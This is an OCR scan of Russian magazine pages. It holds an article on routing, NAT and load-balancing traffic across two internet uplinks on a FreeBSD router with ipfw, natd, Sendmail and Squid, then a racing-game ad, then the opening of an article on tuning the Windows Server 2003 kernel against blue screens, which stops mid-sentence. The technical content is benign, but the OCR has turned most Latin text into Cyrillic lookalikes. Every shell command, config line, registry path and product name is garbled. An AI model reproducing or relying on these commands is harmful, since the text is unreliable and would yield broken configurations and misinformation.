долей вероятности будут справедливы и для остальных никсов. 

Схема «полигона» представлена на рисунке. Внутренняя сеть 
— 172.16.0.0/16, именно ее мы и должны будем выпускать в интер- 
нет. Деление на «подсети» сделано исключительно для удобства. Реаль- 
ные подсети выделять не будем (маска подсети на всех машинах будет 
255.255.0.0). Это позволит нам не возиться с внутренней маршрутиза- 
цией — некогда серьезная проблема перегрузки сегмента сети гуляющими 
по всем портам пакетами, преимущественно из-за которой сеть и дроби- 
лась, канула в Лету вместе с бестолковыми концентраторами (ака хабы) . 
Наш маршрутизатор имеет две сетевые карты для внешних соединений: на 
одну мы сразу получаем реальный ІР-адрес 100.100.100.102 (шлюз про- 
вайдера — 100. 100. 100. 101), во вторую воткнут АБЗЬ-модем с адресом 
192.168.1.1 (с провайдером он соединяется по РРРоЕ, динамически по- 
лучает некоторый ІР для работы и выполняет ИАТ-преобразование на этот 
адрес; впрочем, нам это неинтересно — главное, что адрес 192.168.1.1 
для исходящего трафика мы можем рассматривать как реальный) . 
Очевидно, что динамическая природа второго канала не позволит исполь- 
зовать его для предоставления в Сеть собственных сервисов (например, 
веб-сайта), но в дальнейшем мы не будем на это отвлекаться. 

ПОСТАНОВКА ПРОБЛЕМЫ 

Для начала давай определимся со способами распределения трафика меж- 
ду несколькими каналами. Во-первых, можно тупо делить его «пополам» 
— пакет туда, пакет сюда. Во-вторых, можно использовать «географичес- 
кое» деление — либо внешнее (когда трафик делится в зависимости от 




адреса назначения), либо внутреннее (когда рабочий канал определяется 
источником: бухгалтерию и себя любимого через 1-й, всех остальных 
— через 2-й). В-третьих, можно устроить дележ по типу трафика, скажем, 
выселив 5МТР на отдельный канал и освободив, тем самым, основной для 
беспробудного серфинга. 

В качестве примера рассмотрим решения следующих частных задач (бо- 
лее общие, думаю, ты и сам сможешь получить методом экстраполяции) : 

1 . Направлять трафик , адресованный подсетям 
213.100.0.0/16 и 213.200.0.0/24, во 2-й канал, остальной 
трафик — в 1-й . 

2. Обеспечить по 2-му каналу работу машин с адреса- 
ми 172.16.0.x, а по 1-му — с адресами 172.16.1.x и 
172.16.2.x. 

3. Использовать для ЗМТР-трафика 1-й канал (будем по- 
лагать, что Зепбшаіі работает на этой же машине) , а все 
прочее пусть работает по 2-му каналу. 

4. Выделить НТТР-трафик машин с адресами 172.16.1.x во 
2-й канал, весь остальной трафик оставить на 1-м; НТТР- 
трафик должен проходить через прокси. 

5. Обеспечить балансировку ТСР-трафика между каналами в 
соотношении, близком к 2:1, независимо от типа трафика и 
адресов источника и назначения. 
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Сразу обговорим один нюанс. Думаю, ты уже понял, что трафик будет 
идти не так, как нам хочется, а так, как прописано в таблицах марш- 
рутизации у «чужих дядей». И даже если какой-то исходящий пакет 
мы умудримся пропихнуть в другой интерфейс, и провайдер его там 
не прибьет в рамках мероприятий по борьбе со спуфингом, ответный 
пакет все равно будет придерживаться стандартного маршрута. Отсюда 
следует, что нам нужен КАТ, точнее, по одному на каждый внешний ка- 
нал. Зачем? Ответ найдешь на рисунке: за счет трансляции адресов мы 
будем согласовывать нашу сеть с сетями (а следовательно, и маршрута- 
ми) провайдеров, от которых получаем интернет. Теперь «чужие дяди» 
будут слать пакеты не напрямую нам, а нашим провайдерам, причем 
тем, которым нужно. 

Итак, приступим к героическому преодолению этих проблем. 

ЗАДАЧА 1 : «ВНЕШНЯЯ ГЕОГРАФИЯ» 

Самый простой и очевидный вариант решения — использование 
статической маршрутизации. Шлюз первого соединения объявляем 
шлюзом по умолчанию (туда пойдет весь трафик, кроме особого), а сети 
213.100. 0 . 0/16и213 . 200 . 0 . 0/24 маршрутизируем в канал второго 
провайдера: 

# гоиЬе асісі сіеіаиН: 100 . 100 . 100 . 101 

# гоиЬе асісі 213.100.0.0/16 192.168.1.1 

# гоиЬе асісі 213.200.0.0/24 192.168.1.1 

Чтобы увековечить эти правила маршрутизации, добавим в /еѣс/ 
г с . сопі такие строки: 

$ дгер гоиіе /еіс/гс.согй 

зЬаЦіс_гои{:ез="ргоѵ1_100 ргоѵ1_2 00 " 
гоиЪе_ргоѵ1_1 0 0 = " 2 13 .100.0.0/16 192.168.1.1" 
гоиЪе_ргоѵ1_2 0 0 = " 2 13 .200.0.0/24 192 . 168 .1.1" 
йеіаиІЪгоиЪег="100 . 100 . 100 . 101" 

Как видишь, совсем необязательно ограничивать себя одной 
«особой» сетью — сколько надо, столько во второй канал и перена- 
правляй. Вплоть до того, что туда можно отправить сразу «половину 
интернета»: 



# гоиНе асісі 0.0. 0.0/1 192.168.1.1 

Естественно, о чистой «половине» речи не идет, но, варьируя длину маски 
подсети, можно добиться соотношения трафика в каналах, близкого к 
желаемому. 

На всякий случай снова вернусь к вопросу ИАТ-трансляции. Если все 
внешние интерфейсы имеют реальные адреса, то пакеты, источни- 
ком которых является сам маршрутизатор, никакой трансляции не 
требуют — операционная система достаточно сообразительна, чтобы 
выставить адресом источника именно тот интерфейс, через который 
пакет пойдет в мир иной (в смысле, во внешний) . А вот внутреннюю 
сеть транслировать придется в любом случае, причем на обоих интер- 
фейсах: 

# паЫ -а 100.100.100.102 -р 8668 

# паЬсі -а 192.168.1.2 -р 8669 

# ір Іѵг асісі сЗіѵегЦ 8668 ір Ігош 172.16.0.0/16 Ъо апу ѵіа 
г10 оиЬ 

# ір Іѵг асісі сііѵегі: 8669 ір ігош 172.16.0.0/16 Ъо апу ѵіа 
есЮ оиЬ 

# ір ІѴ7 асісі сііѵегС 8668 ір ігоіп апу Ъо 100 . 100 . 100 . 102 ѵіа 
г10 іп 

# ірі\л/ асісі сііѵегС 8669 ір ігош апу Ъо 192.168.1.2 ѵіа есіО 
іп 

Что произойдет в итоге? Пакет, попав в систему из внутренней сети, 
будет, в зависимости от адреса назначения, направлен на тот или иной 
интерфейс (согласно таблице маршрутизации) . На интерфейсе мы его 
перехватываем и отправляем демону па ѣ сі, чтобы во внешний мир пакет 
попал с нужным ІР-адресом источника. Ну и последними двумя правилами 
не забываем «разнатировать» входящие пакеты. 

Во РгееВЗП 7.0 появилась возможность сделать то же самое без помощи 
внешнего демона па I с і : 

# ір ІѴ7 паЬ 1 сопіід ір 100.100.100.102 

# іріѵ*7 паЦ 2 сопіід іі 192 . 168 .1.1 

# ір ІѴ7 асісі паЪ 1 ігош 172.16.0.0/16 Ъо апу ѵіа г10 

# ірі\л/ асісі паЪ 2 ігогп 172.16.0.0/16 1:о апу ѵіа есіО 
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# ір ім асісі паб 1 ігот апу бо 100 . 100 . 100 . 102 ѵіа 
г10 

# ір іѵі асісі паб 2 ігош апу бо 192 . 168 .1.1 ѵіа есЮ 

Итак, задачу мы решили. Кстати, это решение не единственно 
возможное, и ниже я коснусь еще одного варианта, позволяю- 
щего не трогать правила маршрутизации. 

ЗАДАЧА 2: «ВНУТРЕННЯЯ ГЕОГРАФИЯ» 

Маршрутизацией, как видишь, можно реализовать только 
«внешнее географическое» деление. Наша вторая задача 
относится к «внутренней географии», так что нужно искать 
другое решение. Например, пакетный фильтр (раз он все 
равно нужен для ИАТ-преобразований) — ведь он тоже умеет 
выполнять перенаправление трафика, но гораздо гибче. С 
помощью (огѵѵагб-правил можно затолкать любой пакет в 
нужный нам шлюз. Главное, чтобы его там хорошо приняли. . . 
Получается, первую задачу можно решить и так: 

# іріш асісі 1000 біѵегб 8669 ір ігош 

172.16.0.0/16 бо 213.100.0.0/16 

# ір ІѴ7 асісі 1010 біѵегб 8669 ір ігош 

172.16.0.0/16 бо 213.200.0.0/24 

# іріхѵ асісі 1100 сііѵегі: 8668 ір ігош 

172.16.0.0/16 бо апу 

# ір ІѴ7 асісі 1200 сііѵегі: 8669 ір ігош апу б о 

192.168.1.2 

# ірі™ асісі 13 00 сііѵегі: 8668 ір ігош апу б о 
100.100.100.102 

# ір іѵі асісі 1500 ^ѵ/сі 192 . 168 .1.1 ір ігош 

192.168.1.2 б о апу 

Понятно, что сначала мы должны выполнить трансляцию па- 
кетов, указав в первых двух правилах наши «особые» подсети, 
а остальное перенаправив на «стандартный» ИАТ. Перена- 
правление необходимо, чтобы наши «натированные» пакеты 
с адресом 192.168.1.2 ушли в нужный канал, а не на шлюз 
по умолчанию, куда они будут стремиться. 

Теперь все стало гораздо веселее, потому что мы можем 
варьировать и (тот, и Ю, причем не только по подсетям, но и 
на основании других признаков (номеров портов, типа прото- 
кола и даже идентификатора пользователя) : 

# іріш асісі 10000 сііѵегі: 8669 аіі ігогп 172.16/16 
б о апу 

# ір Іѵі асісі 10010 сііѵегі: 8669 аіі ігош апу бо апу 
80 

# ір Іѵі асісі 10020 сііѵегі: 8669 исір ігош апу б о апу 

# ір іи асісі 1003 0 сііѵегі: 8669 аіі ігош апу бо апу 
иісі 0 




Схема тестовой сети 



Обрати внимание, что в первой задаче (в которой мы исполь- 
зуем маршрутизацию) правила перенаправления должны 
отправлять исходный пакет на внешний интерфейс, где он уже 
будет транслироваться соответствующим образом. Если пакет 
отправлять на ИАТ непосредственно с внутреннего интерфей- 
са, то мы просто не будем знать, на какой из внешних адресов 
его «вешать», так как он еще не прошел маршрутизацию. А в 
этой задаче такого требования нет, поскольку адрес источника 
мы можем определить уже на внутреннем интерфейсе. 

Почему просто выполнить трансляцию недостаточно? Зачем 
еще нужно что-то куда-то перенаправлять или вводить прави- 
ла маршрутизации — пакет ведь получит адресом источника 
ІР-адрес нужного нам интерфейса? Да, таки есть. Только 
вот конечным пунктом пакета будет не шлюз провайдера, а 
произвольный адрес в интернете, поэтому система пропишет 
для него маршрут через шлюз по умолчанию. А там пакет из 
«чужой» сети, скорее всего, никто ждать не будет. Теперь, во 
всем разобравшись, можно написать решение второй задачи: 

# іріѵ? а(іс! 1000 біѵегб 8669 ір ігош 

172.16.0. 0/24 бо апу 

# іріѵ/ а(ісІ 1100 сііѵегі: 8668 ір ігош 

172.16.0. 0/16 бо апу 

# ірі\л7 асісі 1200 сііѵегі: 8669 ір ігош апу б о 

192.168.1.2 

# ірі\л7 асісі 1300 сііѵегі: 8668 ір ігош апу бо 
100 . 100 . 100.102 

# ір ІѴ7 асісі 1500 іѵі<Зі 192 . 168 .1.1 ір ігош 

192.168.1.2 Со апу 

Первое и второе правила отличаются лишь длиной маски 
при определении адреса источника — 1000-м правилом мы 
отправляем адреса из 172 . 168 . 0 .хъпаЬ сі, работающий 
на порту 8669; правило 1 100 выполнит то же самое, но те- 
перь на «стандартный» ИАТ для оставшихся адресов из сети 
172 .168.x. х, 

ЗАДАЧА 3: ОБРАБОТКА ПО ТИПУ ТРАФИКА 

Поскольку Зепсітаіі у нас работает на этой же машине, и 
для него мы отдаем канал с чистым статическим адресом, то 
ЫЛТ на этом участке не понадобится. Таким образом, задача 
сводится к следующим шагам: 

1 . Адрес модема — 192.168.1.1 — объявля- 
ем шлюзом по умолчанию ( "гоибе асісі сіебаиіб 
192.168.1.1") . 

2. Обеспечиваем трансляцию трафика, проходяще- 
го через есіО . 

3. Заставляем Зепсішаіі работать по первому ка- 
налу, не учитывая шлюз по умолчанию. 

Первые два пункта нам уже знакомы. С входящим 5МТР- 
трафиком тоже вопросов возникнуть не должно — доста- 




> іп(о 

• Учти, что (огѵѵагсі 
пока не умеет работать 
из модуля. Поэто- 
му ядро придется 
пересобрать, добавив 
опции ІРЕІРЕШЬЬ , 
ІРЕІРЕШЬЬ_ 
Еокткрм.до кучи. 
ІРШѴЕКТ- 

В РгееВЗО 7.0 можно 
заодно включить 
ІРЕІРЕтЬЬ_№ Т 
и ЫВАЫАЗ (без кото- 
рой ядро не соберется]. 

• Уходить во внешний 
канал па кет должен 
стем ІР-адресом источ- 
ника, ответные пакеты 
на который вышестоя- 
щими провайдерами 
будут отп ра вл яться 
через этотже канал. 

• За счеттрансляции 
адресов мы согласо- 
вываем нашу сеть с се- 
тями (следовательно, 

и маршрутами) про- 
вайдеров, от которых 
получаем интернет. 

• Решение задачи 
резервирования и 
балансировки (мето- 
дом гоипб-гоЫп) для 
ОрепВЗОты найдешь 
в статье «Укрощение 
двухголового змия», 
опубликованной 

в Пакере #092. 




> Ііпкз 

На сайтах ѵѵѵѵѵѵ. 
ореппеі.ги и ѵѵѵѵѵѵ. 
бгеатсаісЬег.ги пред- 
ставлены статьи по 
управлению загрузкой 
двух каналов, обеспе- 
чению отказоустойчи- 
вости и балансировке 
нагрузки. 
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точно прописать на ЭИЗ-сервере МХ-запись, ссылающуюся на гі О 
С 100.100.100 . 102). А вот как заставить трафик уходить с этого же 
адреса, а не через есЮ? В настройках Зепсітаіі есть специальная опция: 

$ дгер СиЕЫТ /еіс/таіі/ту.сіотаіп.ги.тс 

СЬІШТ_0РТІ(Ж5 ( 'Аббг=100.100.100.102 ' ) бпі 

Остается пересобрать конфиг: 

# сб /екс/таіі 

# таке 

# таке іпзкаіі && таке гезкагк 

Теперь адресом источника будет выступать указанный, и все, что от нас 
требуется, — перенаправить эти пакеты в нужный шлюз: 

# ірім абб 1000 імб 100.100.100.101 ір Ігот 
100.100.100.102 ко апу 

В принципе, можно ужесточить правило, скажем, используя уточнение «Іо 
апу 25», но это уже на твое усмотрение. 

Другие МТА тоже должны располагать подобными возможностями, так 
что обращайся к соответствующей документации. 

ЗАДАЧА 4: ЕЩЕ ОДИН ПРИМЕР «ТИПОВОЙ» 

ОБРАБОТКИ 

Можно было бы воспользоваться проверенным методом: пакетным 
фильтром в соответствии с портом назначения распределить трафик по 
разным ЫАТ-серверам. Но ведь у нас есть дополнительное условие — обя- 
зательное использование прокси-сервера. А после прокси і рИѵіуже. не 
увидит адрес источника из внутренней подсети. Поэтому воспользуемся 
тем, что Здиіб умеет сам создавать различные исходящие соединения в 
зависимости от АСЬ-правил: 

$ дгер ЬиЬ /изг/іосаі/еіс/здиісі/здиісі.соп? 

асі Іап зге 172.16.0.0/255.255.0.0 
асі Ъик зге 172.16.1.0/255.255.255.0 
кср_оикдоіпд_аббгезз 192 . 168 .1.1 ЪиЪ. 
кср_оикдоіпд_аббгезз 100.100.100.102 Іап 



За кадром: вопрос 
резервирования 

Проблема резервирования каналов имеет свои особенности. 
Собственно, сводится она к тому, чтобы переопределять сетевые 
параметры (шлюз по умолчанию, таблицу маршрутизации, пра- 
вила пакетного фильтра и т.п.) в зависимости от рабочего канала. 
Но основной задачей является то, что нужно каким-то образом 
определять факт пропадания канала. Для РРР-соединений (в том 
числе и для АЛ5Ь по РРРоЕ) можно воспользоваться скриптами 
іі-ир и іі-боѵѵп (детали могут отличаться в зависимости от реали- 
зации; подробности, как всегда, ищи в документации) . В случае 
же статического ІР-адреса до сих пор ничего проще, чем ріп§, мне 
не попадалось. Кстати, в случае РРР-соединения проблема может 
возникнуть не только на «последней миле», но и далее — в сети 
провайдера. Тогда линк будет стоять, как вкопанный, а вот ра- 
ботать ничего не будет. Выходит, что универсальным средством 
является банальный ріп§. Примеры скриптов, решающих задачу 
резервирования канала, можно поискать в Сети — проблема не 
нова и готовых решений, в принципе, хватает. 



Не забудь перенаправить выходящие со Здиіб-а пакеты в нужные интер- 
фейсы, дабы они не устремились в шлюз по умолчанию, чего нам совсем 
не надо: 

# ір іѵі абб 1500 кѵ?б 192.168.1.1 ір ігот 192.168.1.2 ко 
апу 

Об интерфейсе 100.100.100.102 беспокоиться не нужно — эти пакеты 
и так уйдут, куда надо, согласно параметру сіеііаиі Ігои Ь ег. 

ЗАДАЧА 5: ПРОПОРЦИОНАЛЬНАЯ БАЛАНСИРОВКА 

Наконец, пятая задача. Здесь уже зацепиться не за что — по условию не 
должно быть никакой дискриминации ни по источнику, ни по адресу на- 
значения. . . Нужно просто обеспечить пропорциональное деление всего 
трафика. Понятно, что ИАТ-правила по-прежнему необходимы. Вопрос 
в том, как сделать, чтобы первое из них оставляло треть пакетов для второ- 
го. В іріѵѵ для этого можно воспользоваться правилом зкірГо с опцией ргоЪ: 

# пакб -а 100.100.100.102 -р 8668 

# пакб -а 192.168.1.1 -р 8669 

# ір іѵі абб 0500 скеск-зкаке 

# ір іѵг абб 0900 ргоЬ 0.330000 зкірко 1100 кер кгот 
172.16.0.0/16 ко апу зекир кеер-зкаке 

# ір абб 1000 біѵегк 8668 ір кгот 172 .16.0. 0/16 ко апу 

# ір абб 1050 зкірко 12 00 ір кгот апу ко апу 

# ір абб 1100 біѵегк 8669 ір кгот 172 .16.0. 0/16 ко апу 

# ірк\л7 абб 12 00 біѵегк 8668 ір кгот апу ко 
100.100.100.102 ѵіа гЮ 

# ір іѵг абб 1300 біѵегк 8669 ір кгот апу ко 192 .168.1.2 
ѵіа ебО 

# іркм абб 1500 кѵ?б 192.168.1.1 ір кгот 192.168.1.2 ко 
апу 

Другими словами, треть соединений мы «прокидываем» на второй 
ИАТ, а остальное пойдет на первый. Проверка состояния (кеер-згаге/ 
скеск-зиане) нужна для того, чтобы не разбрасывать пакеты, принад- 
лежащие одному соединению, по разным каналам. Фактически мы 
выполняем распределение не пакетов, а ТСР-сессий в целом — для 
первого пакета сессии будет запомнено действие зкіріо (если пакет 
попадет под ргоЪ), и в дальнейшем все пакеты этой сессии 500-м 
правилом будут отправляться сразу на 1100-е. Конечно, по трафику 
сессии могут сильно отличаться, но в долговременной перспективе 
можно считать, что соотношение трафика близко к желаемому. 

Если ты собираешься использовать новые паГ-правила в РгееВЗБ 7.0, 
учти, что следует также изменить значение зузсб-переменнойпеС . 
іпеі . ір . Им. оп е_ра зб. В новой фряхе по умолчанию используется 
«однопроходный» сценарий обработки пакетов, когда после паи-правила 
пакет в цепочку не возвращается; но ведь нам надо и в нужный шлюз его 
перенаправить : 

# зузскі пек . іпек . ір . кѵ?. опе_разз=0 
пек . іпек . ір . ІѴ7. опе_разз : 1 -> 0 

В остальном принцип должен сохраниться. 

ПОДВОДИМ ИТОГИ 

Как видишь, почти все решаемо. Нужно только «схватить» главную идею 
— уходить во внешний канал пакет должен с тем ІР-адресом источника, 
ответные пакеты на который вышестоящими провайдерами будут от- 
правляться через этот же канал. В большинстве случаев самым приемле- 
мым (и в то же время простым) вариантом будет использование ИАТ. Не 
забывай и про дополнительные возможности используемых тобой прило- 
жений — не исключено, что в отдельных случаях они смогут предоставить 
более элегантное решение. ПЗС 
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представляет оп-Ііпе игру 





Многочисленные призы 
от АІріпе 



Махі Касіпд - это виртуальный мир гонок на твоем компьютере! 

Хочешь обладать самым крутым гоночным автомобилем? Значит - Махі Касіпд для тебя! 

В игре у тебя есть возможность купить авто, доработать его по полной и продать дороже, 
а на вырученные деньги купить новую тачку, ещё круче. Но самое главное: побеждаешь в 
игре - побеждаешь в реальности! Каждый месяц новые призы! Ты можешь выиграть 
компоненты Саг Аибіо & МоЬіІе Мебіа от АІріпе, страховку РОСНО на свое авто. 

А в конце года лучший получит реальный автомобиль - Ореі Согза! 



МАХІ КАСІІЧС. ИГРАЙ И ВЫИГРЫВАЙ! 

Все подробности игры на сайте ѵѵѵѵѵѵ.тахі-гасіпд.ги и ѵѵѵѵ\л/.тахі-1:ипіпд.ги 



РОСНО 



в составе АШапг (Ш) 



±шяпяпд 



тзп: 
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без В5СЮ 



СКРЫТЫЕ РЫЧАГИ УПРАВЛЕНИЯ ЯДРОМ ѴѴШООѴѴ55ЕКѴЕР2003 

Синий экран смерти — одна из самых больших неприятностей, которая 
только может случиться с сервером. Хотелось бы, чтобы она происходила как 
можно реже, пусть даже ценой некоторого снижения производительности 
и увеличения потребления оперативной памяти. Говорить будем, главным 
образом, о Зегѵег 2003 Зтапбагб ЕсИтіоп. Но все сказанное во многом будет 
справедливо и для других ОС линейки ОТ. 



Синий экран смерти вспыхивает всякий раз, когда ядро диагностирует 
критическую ошибку, которую не в состоянии корректно обработать. 
Например: обращение по нулевому указателю, попытка освобождения 
уже освобожденной памяти и т.д. Ядро передает управление процедуре 
КеВидСЬескЕх, ответственной за «отрисовку» В5СЮ и сохранение 
дампа памяти (если администратор действительно хочет его сохра- 
нить). Некоторые отладчики уровня ядра (например, ЗоМСЕ) пере- 
хватывают вызов КеВидСЪескЕх, позволяя оператору «разрулить» 
ситуацию самостоятельно и вернуть систему к жизни. Это требует 
достаточно высокой квалификации, так что на этом вопросе подробно 
останавливаться не будем. 

При всем моем уважении к ИТ, следует сказать, что у нее бездарное, 
кривое и недописанное (!) ядро. Еще со времен ОТ 4.x (если не рань- 
ше) была предусмотрена возможность вызова саІІ-Ьаск’ов (функций 
обратного вызова) из КеВидСЪескЕх, позволяющих, в частности, 
сбросить дисковые буферы, чтобы не погубить дисковый том. Но на 
дворе уже Зегѵег 2008, а практическая реализация саІІ-Ъаск’ов даже 
не обещается (хотя в ОТР5 драйвере все готовое для этого есть, стран- 
но, не правда ли? !) . 



Другая неприятная черта ОТ — нежелание разбираться с источниками 
критических ошибок. При возникновении исключения в загружаемом 
модуле ядра и Ілпих, и хВЗБ просто выгружают модуль, продолжая 
нормальную работу системы. Только в действительно критических 
ситуациях система впадает в панику («кегпеі рапіс» — аналог В5СЮ) . 
Казалось бы, у разработчиков ОТ в наличии все необходимые ингре- 
диенты: имеется список модулей (то есть драйверов); у драйверов 
есть процедура, ответственная за выгрузку драйвера (а даже если ее 
нет, система имеет возможность выгружать драйвера в аварийном 
режиме); функция КеВидСкескЕх в большинстве случаев определяет 
имя драйвера-виновника. Ну что же мешает его выгрузить? Ладно, не 
будем о грустном, а сразу перейдем к делу. 

Основными источниками В 5 СЮ являются: дефекты железа, кривые драй- 
вера и гоогіаі’ы. Некоторые АРІ-функции прикладного уровня за счет 
ошибок проектирования также могут приводить к синим экранам (как 
и ошибки в самом ядре системе) , но их доля в общем зачете невелика. 
Итак, по большому счету остаются только железо и драйверы/гооикіГы. 
Что касается железа, то лучшим средством борьбы будет приобре- 
тение качественных комплектующих, установка дополнительных 
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радиаторов, прокладка аэродинамических кабелей, 
уменьшение тактовых частот/увеличение таймингов 
вкупе с увеличением питающего напряжения (большин- 
ство ВІ05 это позволяют). Программным путем аппарат- 
ные глюки никак не исправишь (исключение составляет 
блокировка использования битых ячеек памяти, но с 
учетом нынешних цен на память эти извращения неак- 
туальны) . 

Таким образом, в списке остались лишь драйвера/ 
гооікп’ы. Ну, гооікіі’ы удаляем сразу («] [акер» неод- 
нократно писал, как), а вот с драйверами проблема. 
Хороших системных программистов очень мало, а фирм, 
разрабатывающих железо — великое множество, вот и 
приходится нанимать «мальчиков по объявлению», кле- 
пающих драйверы в визуальных средах проектирования 
типа ОгіѵегЗшсІіо, а потом удивляющихся, почему они па- 
дают. Исправление ошибок в драйвере — дело посильное 
(достаточно дружить с дизассемблером и отладчиком). 
Нетрудно, конечно, скачать более свежую версию (в 
надежде, что там хотя бы часть ошибок исправлена), но 
лучше и надежнее переконфигурировать ядро опера- 
ционной системы, сделав его менее чувствительным к 
ошибкам в драйверах. Чем мы сейчас, собственно говоря, 
и займемся. 

РЫЧАГИ УПРАВЛЕНИЯ ЯДРОМ 

Ядро поддерживает множество рычагов управления. Ниже 
перечислены только основные из них. 

Ьооі.іпі. ФайлЬооЬ . іпі, который находится в корневом 
каталоге системного диска, принимает большое коли- 
чество параметров, управляющих конфигурацией ядра. 
Параметры подробно описаны на М5РИ: зиррогі.шісгозоіі:. 
сот/кЬ/833721/ги (только документированные ключи) и 
в статье Марка Руссиновича «Вооі.іпі оргіопз геіегепсе» на 
сайте у\плдулпгетегоеи 2 тап.сот.аг . 

Глобальные флаги. Ядро ИТ поддерживает так называ- 
емые «глобальные флаги», управляющие его поведением. 
Задаются они с помощью утилиты дЫадз . ехе, входящей 
в комплект поставки «ЗирроіТ Тооіз», и в РРК, который 
можно бесплатно скачать с сайта МісгозоН. 

Реестр. Ядро ѴѴіп2кЗ поддерживает свыше 128 ключей 
реестра, большинство из которых не документировано и 
добыто путем дизассемблирования. Нет смысла расска- 
зывать обо всех, однако их описание (вместе с полным 
путем к реестру) легко найти в Соо§1е по имени ключа. 
Практически все ключи описаны в различных источниках 
(форумах, блогах, исходных текстах КеасЮЗ и т.д.) . 




ІП0І__І_Е55_0П_ЕСіиАІ_ — один из самых часто 
встречающихся синих экранов, возникающий при 
попытке обращения кстранице, вытесненной на 
диск на том уровне привилегий, на котором подкачка 
не функциональна 




Настройка ѴѴіп2кЗ под виртуаль- 
ной машиной ѴМ ѴѴаге 




НАИБОЛЕЕ ПОПУЛЯРНЫЕ В50БЫ 
И СПОСОБЫ ИХ УСТРАНЕНИЯ 

Появление многоядерных процессоров поставило драйверы 
«в позу», к чему большинство из них оказалось совершенно 
не готово. Синие экраны начали вспыхивать с вероятностью, 
зависящей от частоты поступления прерываний от аппарат- 
ных устройств. Рассмотрим вполне типичную ситуацию: 
потока выполняется на ядре I с ІКОЬ- РАЗ ЗІѴЕ_ЬЕѴЕЬ, в 
то время как поток В выполняется на ядре II с тем же ІКОЬ. 
Устройство Ьеѵі се 1 посылает ядру I сигнал прерывания, 
которое ловит ядро операционки, повышает ІКОЬ процес- 
сорного ядра I до ЬІКОЬ и передает управление на обработку 
прерывания устройства Веѵісе 1 . Обработчик выполняет 
первичную обработку ситуации и ставит отложенную про- 
цедуру ПрсЕогІзг ( ) в очередь для дальнейшей обработки. 
При этом функция добавляется в очередь того процессорного 
ядра, на котором запущен обработчик (в данном случае — это 
ядро Т). 

Устройство Веѵі се 1 вновь генерирует прерывание, которое 
на этот раз посылается ядру 1 1, поскольку ядро I еще не 
успело выйти из обработчика прерывания и понизить ІКОЬ. 
Ось повышает ІКОЬ ядра 1 1 до ЬІКОЬ и передает управление 
обработчику прерываний устройства Ьеѵі се 1, который 
ставит еще одну отложенную процедуру БрсЕогІзг ( ) в 
очередь на выполнение ядра II. 

Наконец, обработчики прерываний на обоих ядрах завер- 
шаются, ось понижает ІКОЬ, и начинается выполнение 
отложенных процедур, стоящих в очередяхядра I и ядра II. 

В результате, одна и та же процедура ВрсЕогІ зг() на обоих 
ядрах исполняется одновременно, обрабатывая сразу два 
различных прерывания! Маленькая небрежность кодиро- 
вания приводит к ошибкам синхронизации, вызывающим 
каскад вторичных ошибок и способным генерировать добрую 
половину всех существующих синих экранов. 

Выход? 

Использовать только одно ядро, игнорируя все остальные, 
для чего достаточно указать ключ /ОЫЕСРВ или /ЫІМРКОС-1 
в файле Ъооі . іпі . Конечно, это снизит производительность, 
но если кривой драйвер при интенсивном поступлении 
прерываний не справляется с синхронизацией и обрушивает 
систему в В8СЮ, то лучше поступиться производительностью, 
чем надежностью. 

А кому не знаком В 5 00 с противным названием ІКОЬ_ 
ЬЕЗЗ_ОК_Е0ПАЬ, выпрыгивающий в самый неподходящий 
момент? Что это такое, и почему он возникает? Операци- 
онные системы семейства N1 используют особую систему 
приоритетов прерываний ІпГеггирі: Ке^ие51: Ьеѵеіз (или 



> ІП^О 

• Подробное описание 
всех ВВСЮ’ов вместе 
с причинами их возник- 
новения и рекоменда- 
циями по их предот- 
вращению можно 
найти каквМ50Ы,так 
и в йОК. Однако и то, 
и другое, в первую оче- 
редь, ориентировано 
на программистов, 
знающих ассемблер, 
умеющих работать с 
отладчиком и готовых 
часами разбирать 
дампы памяти для 
поиска ошибки в под- 
опытном драйвере. 

•Если кривой драйвер 
при интенсивном пос- 
туплении прерываний 
не справляется 
с синхронизацией 
и обрушивает систему 
в ВЗСЮ, то лучше 
поступиться произ- 
водительностью, чем 
надежностью. 
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Статью «ВооГ.іпі 
орбопз геі'егепсе» 
Марка Руссино- 
вича ищи на ѵѵѵѵѵѵ. 
іпдепіегодигтап. 
сот .а г 




> СІѴСІ 

На прилагаемом к 
журналу диске ты най- 
дешь исошку ѴѴІ ПСІ0ѴѴ5 
Зегѵег 2003 8Р1 ЭЭК. 



сокращенно ІКО), оперирующую целыми числами от 0 до 
31. Уровень 0 имеет минимальный приоритет, 31 — мак- 
симальный. Нормальное выполнение потока происходит 
на пассивном уровне (РАЗЗІѴЕ ЬЕѴЕЬ == 0), и его может 
прерывать любое асинхронное событие, возникающее в 
системе. При этом ось повышает текущий ПКД до уровня 
возникшего прерывания и передает управление его І5К 
(ШГеггирГ Зегѵісе Коийпе — процедура обработки преры- 
вания), причем, подкачка страниц с диска работает только 
на уровне 2, а прерывания, генерируемые устройствами, 
начинаются с уровня 3. И потому первичные обработчики 
прерываний не могут обращаться к памяти ядра, вытесня- 
емой на диск! Увы, как показывает практика, они к ней все- 
таки обращаются. Если запрещенная страница находится в 
памяти, то все ОК, а вот если она вытеснена на диск, тогда- 
то и возникает указанный В5СЮ. 

Как его предотвратить? Решение первое — увеличить коли- 
чество оперативной памяти, чтобы шансы на вытеснение 
запрашиваемых страниц были минимальны. Решение вто- 
рое — запретить свопинг ядра на диск, для чего необходимо 
установить параметр « ОізаЫеРадіпдЕхесиѣіѵе » (типа 
ОѴѴОШЭ) в значение 1 (он находится в следующей ветке 
реестра: НКЬМ\ЗУЗТЕМ\СиггепѣСопЬгоІЗеѣ\СопЬго1 \ 
ЗеззіопМападег \МетоігуМападетепі;') . Также следует 
запустить §11а§5.ехе с флагом брз, запрещающим вытесне- 
ние стека ядра на диск. Изменения вступят в силу только 
после перезагрузки. И хотя потребности в памяти слегка 
увеличиваются (поскольку ядро уже не может вытеснить 
бездействующие драйвера), общая надежность системы 
значительно повышается. Кроме того, система стано- 
вится нечувствительной к определенным типам Бо5 атак, 
«съедающим» всю доступную память и вынуждающим ядро 
активно свопиться на диск в надежде, что в системе обна- 
ружится хоть один кривой драйвер, вызывающий ВЗСЮ с 
пресловутым ІКОЬ_ЬЕЗЗ_ОР_ЕОІІАЬ. 

Кстати говоря, в ѴѴіп2кЗ 5Р2 допущена досадная ошибка, 
связанная с некорректной реализацией ЗаІеЗЕН и обру- 
шивающая систему в ВЗСЮ при вызове такой безобидной 




Описаниеутилиты дйадз.ехе на сайте МісгозоЙТесЬСепІег 



функции, как БЪдРгіпі, использующейся в драйверах для 
отладочной печати. Подробнее об этом можно прочитать в 
